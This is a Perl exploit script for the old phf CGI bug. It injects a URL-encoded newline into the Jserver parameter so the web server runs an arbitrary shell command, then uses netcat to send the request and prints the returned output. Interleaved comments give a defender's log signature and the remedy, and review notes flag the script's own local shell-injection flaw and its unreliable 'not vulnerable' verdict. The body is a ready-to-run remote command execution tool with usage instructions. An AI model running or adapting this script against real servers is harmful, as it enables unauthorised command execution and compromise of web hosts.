#!/usr/bin/perl
# Exploits bug in /cgi-bin/phf 
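# Usage:  cgihack host arg1 arg2 arg3 ...
#   host is the web server to query; arg1 arg2 ... are joined into the command string.
#   With no arguments the script prompts for the host and the command instead.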

# Program used as the TCP client. Change $client to telnet if you don't have
# netcat. The name is pasted into a shell pipeline further down, so it is
# looked up through the local shell's PATH.
$client = "nc";

# Interactive fallback: with no command-line arguments, prompt for the host
# and the command. <> reads STDIN here because @ARGV is empty.
if ( $#ARGV < 0 ) {
  print("Host: ");
  # chop() drops the last character unconditionally (normally the newline);
  # input that ends without a newline loses its final real character.
  chop($HOST = <>);
  print("Command: ");
  chop($CMD = <>);
  # Rebuild @ARGV as if "host word1 word2 ..." had been given on the
  # command line; split(' ') splits on runs of whitespace.
  $RAW = "$HOST $CMD";
  @RAW = split(' ', $RAW);
  @ARGV = @RAW;
}

# Join $ARGV[1] .. $ARGV[$#ARGV] into one string, separated by "%20"
# (a URL-encoded space). $ARGV[0] is the host and is not part of it.
for ( $n = 1; $n < $#ARGV + 1; $n++ ) {
  $PHFARG = $PHFARG."$ARGV[$n]";
  $PHFARG = $PHFARG."%20" if ($n != $#ARGV); 
}

# Request line sent to the server. It carries no HTTP version and no headers.
# The Jserver value is followed by %0A (a URL-encoded newline), then the
# joined command string, then a second %0A.
# Defender's view: in access logs and on the wire this shows up as a GET for
# /cgi-bin/phf whose query string contains %0A; the phf path together with an
# encoded newline in a parameter is the signature to alert on. Server-side,
# the remedy is to remove phf from cgi-bin or replace it with a build that
# rejects newlines in its parameters.
$C_ARG = "GET /cgi-bin/phf?Jserver=foobar.com%0A$PHFARG%0A&Qname=A";
# Two-argument pipe open: the whole string is run by the local shell, and the
# response is read back from the pipeline's stdout through the bareword handle
# OUTPUT. The port is fixed at 80.
# NOTE(review): $C_ARG and $ARGV[0] are interpolated into the shell command
# as-is, so a single quote or shell metacharacter in the host or the
# arguments is interpreted by the shell on the machine running this script.
# NOTE(review): the return value of open() is not checked.
open(OUTPUT, "echo \'$C_ARG\' | $client $ARGV[0] 80 |");

# $go counts the response lines that contain <PRE>; isgood() updates it.
$go = 0;
while(<OUTPUT>) {
    # isgood inspects the current line through $_ (it takes no arguments).
    print $_ if &isgood;
}
# The verdict depends only on whether a line containing <PRE> was ever read.
# A failed connection, a missing client program, or any reply without <PRE>
# also ends up here, so this message is not evidence that the host is patched;
# conversely, any reply that happens to contain <PRE> suppresses it.
print "$ARGV[0] is not vulnerable\n" if ( $go == 0 ); 

# Line filter for the response loop. Works on the current line in $_ and on
# the global counter $go; takes no arguments.
#   - A line containing <PRE> bumps $go and is rejected (false).
#   - Once $go is non-zero, any line that does not contain </PRE> is
#     accepted (true).
#   - Everything else is rejected (false).
# $go is never reset, so lines that follow </PRE> are accepted as well.
sub isgood {
  if ( $_ =~ m{<PRE>} ) {
    $go += 1;
    return 0;
  }
  return ( $go && $_ !~ m{</PRE>} ) ? 1 : 0;
}
